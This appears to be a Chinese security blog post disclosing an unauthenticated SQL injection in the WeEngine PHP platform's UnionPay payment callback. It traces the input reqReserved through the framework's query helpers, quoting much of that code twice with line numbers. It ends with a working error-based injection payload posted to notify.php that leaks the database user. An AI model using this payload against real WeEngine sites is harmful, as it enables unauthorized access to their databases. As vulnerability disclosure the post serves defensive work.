微擎科技最新版某处无需登录sql注入 - 体验盒子

<?php
/**
 * [WeEngine System] Copyright (c) 2014 WE7.CC
 * WeEngine is NOT a free software, it under the license terms, visited http://www.we7.cc/ for more details.
 */
error_reporting(0);
define('IN_MOBILE', true);
require '../../framework/bootstrap.inc.php';
$_W['uniacid'] = $_POST['reqReserved'];

$setting = uni_setting($_W['uniacid'], array('payment'));
if(!is_array($setting['payment'])) {
	exit('没有设定支付参数.');
}
$payment = $setting['payment']['unionpay'];
require '__init.php';

if (!empty($_POST) &amp;&amp; verify($_POST) &amp;&amp; $_POST['respMsg'] == 'success') {
	$sql = 'SELECT * FROM ' . tablename('core_paylog') . ' WHERE `uniontid`=:uniontid';
	$params = array();
	$params[':uniontid'] = $_POST['orderId'];
	$log = pdo_fetch($sql, $params);
	if(!empty($log) &amp;&amp; $log['status'] == '0') {
		$log['tag'] = iunserializer($log['tag']);
		$log['tag']['queryId'] = $_POST['queryId'];

		$record = array();
		$record['status'] = 1;
		$record['tag'] = iserializer($log['tag']);
		pdo_update('core_paylog', $record, array('plid' =&gt; $log['plid']));
				if($log['is_usecard'] == 1 &amp;&amp; $log['card_type'] == 1 &amp;&amp;  !empty($log['encrypt_code']) &amp;&amp; $log['acid']) {
			load()-&gt;classs('coupon');
			$acc = new coupon($log['acid']);
			$codearr['encrypt_code'] = $log['encrypt_code'];
			$codearr['module'] = $log['module'];
			$codearr['card_id'] = $log['card_id'];
			$acc-&gt;PayConsumeCode($codearr);
		}
				if($log['is_usecard'] == 1 &amp;&amp; $log['card_type'] == 2) {
			$log['card_id'] = intval($log['card_id']);
			pdo_update('activity_coupon_record', array('status' =&gt; '2', 'usetime' =&gt; time(), 'usemodule' =&gt; $log['module']), array('uniacid' =&gt; $_W['uniacid'], 'recid' =&gt; $log['card_id'], 'status' =&gt; '1'));
		}

		$site = WeUtility::createModuleSite($log['module']);
		if(!is_error($site)) {
			$method = 'payResult';
			if (method_exists($site, $method)) {
				$ret = array();
				$ret['weid'] = $log['uniacid'];
				$ret['uniacid'] = $log['uniacid'];
				$ret['result'] = 'success';
				$ret['type'] = $log['type'];
				$ret['from'] = 'nofity';
				$ret['tid'] = $log['tid'];
				$ret['user'] = $log['openid'];
				$ret['fee'] = $log['fee'];
				$ret['tag'] = $log['tag'];
				$ret['is_usecard'] = $log['is_usecard'];
				$ret['card_type'] = $log['card_type'];
				$ret['card_fee'] = $log['card_fee'];
				$ret['card_id'] = $log['card_id'];
				$site-&gt;$method($ret);
				exit('success');
			}
		}
	}
}
exit('fail');

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

<?php

/**

* WeEngine is NOT a free software, it under the license terms, visited http://www.we7.cc/ for more details.

*/

error_reporting(0);

define('IN_MOBILE', true);

require '../../framework/bootstrap.inc.php';

$_W['uniacid'] = $_POST['reqReserved'];

$setting = uni_setting($_W['uniacid'], array('payment'));

if(!is_array($setting['payment'])) {

exit('没有设定支付参数.');

}

$payment = $setting['payment']['unionpay'];

require '__init.php';

if (!empty($_POST) && verify($_POST) && $_POST['respMsg'] == 'success') {

$sql = 'SELECT * FROM ' . tablename('core_paylog') . ' WHERE `uniontid`=:uniontid';

$params = array();

$params[':uniontid'] = $_POST['orderId'];

$log = pdo_fetch($sql, $params);

if(!empty($log) && $log['status'] == '0') {

$log['tag'] = iunserializer($log['tag']);

$log['tag']['queryId'] = $_POST['queryId'];

$record = array();

$record['status'] = 1;

$record['tag'] = iserializer($log['tag']);

pdo_update('core_paylog', $record, array('plid' => $log['plid']));

if($log['is_usecard'] == 1 && $log['card_type'] == 1 && !empty($log['encrypt_code']) && $log['acid']) {

load()->classs('coupon');

$acc = new coupon($log['acid']);

$codearr['encrypt_code'] = $log['encrypt_code'];

$codearr['module'] = $log['module'];

$codearr['card_id'] = $log['card_id'];

$acc->PayConsumeCode($codearr);

}

if($log['is_usecard'] == 1 && $log['card_type'] == 2) {

$log['card_id'] = intval($log['card_id']);

pdo_update('activity_coupon_record', array('status' => '2', 'usetime' => time(), 'usemodule' => $log['module']), array('uniacid' => $_W['uniacid'], 'recid' => $log['card_id'], 'status' => '1'));

}

$site = WeUtility::createModuleSite($log['module']);

if(!is_error($site)) {

$method = 'payResult';

if (method_exists($site, $method)) {

$ret = array();

$ret['weid'] = $log['uniacid'];

$ret['uniacid'] = $log['uniacid'];

$ret['result'] = 'success';

$ret['type'] = $log['type'];

$ret['from'] = 'nofity';

$ret['tid'] = $log['tid'];

$ret['user'] = $log['openid'];

$ret['fee'] = $log['fee'];

$ret['tag'] = $log['tag'];

$ret['is_usecard'] = $log['is_usecard'];

$ret['card_type'] = $log['card_type'];

$ret['card_fee'] = $log['card_fee'];

$ret['card_id'] = $log['card_id'];

$site->$method($ret);

exit('success');

}

exit('fail');

require '../../framework/bootstrap.inc.php';
$_W['uniacid'] = $_POST['reqReserved'];

$setting = uni_setting($_W['uniacid'], array('payment'));
if(!is_array($setting['payment'])) {
	exit('没有设定支付参数.');
}

1

2

3

4

5

6

7

require '../../framework/bootstrap.inc.php';

$_W['uniacid'] = $_POST['reqReserved'];

$setting = uni_setting($_W['uniacid'], array('payment'));

if(!is_array($setting['payment'])) {

exit('没有设定支付参数.');

}

if (!function_exists('uni_setting')) {
	function uni_setting($uniacid = 0, $fields = '*', $force_update = false) {
		global $_W;
		load()-&gt;model('account');
		if ($fields == '*') {
			$fields = '';
		}
		return uni_setting_load($fields, $uniacid);
	}
}

1

2

3

4

5

6

7

8

9

10

if (!function_exists('uni_setting')) {

function uni_setting($uniacid = 0, $fields = '*', $force_update = false) {

global $_W;

load()->model('account');

if ($fields == '*') {

$fields = '';

}

return uni_setting_load($fields, $uniacid);

}

function uni_setting_load($name = '', $uniacid = 0) {
	global $_W;
	$uniacid = empty($uniacid) ? $_W['uniacid'] : $uniacid;
	$cachekey = "unisetting:{$uniacid}";
	$unisetting = cache_load($cachekey);
	if (empty($unisetting)) {
		$unisetting = pdo_get('uni_settings', array('uniacid' =&gt; $uniacid));
		if (!empty($unisetting)) {
			$serialize = array('site_info', 'stat', 'oauth', 'passport', 'uc', 'notify', 
								'creditnames', 'default_message', 'creditbehaviors', 'shortcuts', 'payment', 
								'recharge', 'tplnotice', 'mcplugin');
			foreach ($unisetting as $key =&gt; &amp;$row) {
				if (in_array($key, $serialize) &amp;&amp; !empty($row)) {
					$row = (array)iunserializer($row);
				}
			}
		}
		cache_write($cachekey, $unisetting);
	}
	if (empty($unisetting)) {
		return array();
	}
	if (empty($name)) {
		return $unisetting;
	}
	if (!is_array($name)) {
		$name = array($name);
	}
	return array_elements($name, $unisetting);
}

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

function uni_setting_load($name = '', $uniacid = 0) {

global $_W;

$uniacid = empty($uniacid) ? $_W['uniacid'] : $uniacid;

$cachekey = "unisetting:{$uniacid}";

$unisetting = cache_load($cachekey);

if (empty($unisetting)) {

$unisetting = pdo_get('uni_settings', array('uniacid' => $uniacid));

if (!empty($unisetting)) {

$serialize = array('site_info', 'stat', 'oauth', 'passport', 'uc', 'notify',

'creditnames', 'default_message', 'creditbehaviors', 'shortcuts', 'payment',

'recharge', 'tplnotice', 'mcplugin');

foreach ($unisetting as $key => &$row) {

if (in_array($key, $serialize) && !empty($row)) {

$row = (array)iunserializer($row);

}

cache_write($cachekey, $unisetting);

}

if (empty($unisetting)) {

return array();

}

if (empty($name)) {

return $unisetting;

}

if (!is_array($name)) {

$name = array($name);

}

return array_elements($name, $unisetting);

}

$unisetting = pdo_get('uni_settings', array('uniacid' =&gt; $uniacid));

1	$unisetting = pdo_get('uni_settings', array('uniacid' => $uniacid));

function pdo_get($tablename, $condition = array(), $fields = array()) {
	return pdo()-&gt;get($tablename, $condition, $fields);
}

1

2

3

function pdo_get($tablename, $condition = array(), $fields = array()) {

return pdo()->get($tablename, $condition, $fields);

}

	public function get($tablename, $params = array(), $fields = array()) {
		$select = '*';
		if (!empty($fields)){
			if (is_array($fields)) {
				$select = '`'.implode('`,`', $fields).'`';
			} else {
				$select = $fields;
			}
		}
		$condition = $this-&gt;implode($params, 'AND');
		$sql = "SELECT {$select} FROM " . $this-&gt;tablename($tablename) . (!empty($condition['fields']) ? " WHERE {$condition['fields']}" : '') . " LIMIT 1";
		return $this-&gt;fetch($sql, $condition['params']);
	}

1

2

3

4

5

6

7

8

9

10

11

12

13

public function get($tablename, $params = array(), $fields = array()) {

$select = '*';

if (!empty($fields)){

if (is_array($fields)) {

$select = '`'.implode('`,`', $fields).'`';

} else {

$select = $fields;

}

$condition = $this->implode($params, 'AND');

$sql = "SELECT {$select} FROM " . $this->tablename($tablename) . (!empty($condition['fields']) ? " WHERE {$condition['fields']}" : '') . " LIMIT 1";

return $this->fetch($sql, $condition['params']);

}

http://127.0.0.1/payment/unionpay/notify.php
post:
reqReserved[]=1'and extractvalue(1, concat(0x5c, (select user()))),'1

1

2

3

http://127.0.0.1/payment/unionpay/notify.php

post:

reqReserved[]=1'and extractvalue(1, concat(0x5c, (select user()))),'1